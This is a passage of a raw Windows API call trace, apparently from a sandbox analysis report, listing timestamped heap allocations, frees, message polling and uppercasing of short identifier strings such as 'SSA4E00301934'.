hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0266.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0266.438] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0266.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0266.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0266.438] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0266.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0266.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0266.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0266.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2de8 [0266.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0266.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0266.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0266.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0266.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b16e8 [0266.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0266.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0266.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa080 [0266.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0266.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0266.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0266.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0266.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0266.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0266.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0266.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0266.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0266.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0266.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0266.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0266.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0266.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0266.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa7e8 [0266.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0266.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acc60 [0266.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0266.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0266.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0266.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0266.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0266.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0266.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0266.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0266.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0266.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0266.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0266.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0266.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0266.440] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0266.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0266.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0266.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0266.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0266.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0266.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0266.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0266.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0266.441] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0266.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0266.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0266.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0266.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0266.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0266.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0266.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0266.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0266.441] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0266.441] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0266.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0266.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0266.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0266.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0266.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0266.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0266.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0266.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0266.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0266.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0266.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0266.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0266.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0266.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0266.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0266.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0266.442] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0266.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0266.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0266.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0266.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0266.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0266.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0266.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0266.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0266.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0266.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0266.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0266.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0266.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0266.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0266.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0266.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0266.443] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0266.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0266.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0266.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0266.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0266.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0266.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0266.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0266.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0266.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0266.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0266.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0266.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0266.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0266.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0266.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0266.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0266.444] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0266.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0266.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0266.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0266.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0266.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0266.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0266.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0266.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0266.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0266.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0266.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0266.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0266.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0266.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0266.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0266.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0266.445] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0266.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0266.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0266.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0266.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0266.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0266.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0266.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0266.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0266.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0266.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0266.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0266.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0266.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0266.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0266.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0266.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0266.446] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0266.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0266.446] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0266.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0266.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0266.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b70 [0266.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0266.447] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0266.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0266.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0266.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0266.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0266.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0266.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0266.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0266.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0266.447] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0266.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0266.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0266.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0266.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0266.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0266.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0266.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0266.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0266.448] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0266.448] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0266.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0266.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0266.448] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0266.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0266.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0266.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9af8 [0266.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0266.448] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0266.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0266.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0266.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0266.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0266.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0266.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0266.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0266.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0266.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0266.449] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0266.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0266.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0266.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0266.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0266.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0266.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0266.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0266.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0266.449] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0266.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0266.449] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0266.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0266.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0266.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0266.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0266.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0266.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0266.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0266.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0266.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0266.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0266.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0266.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0266.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0266.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 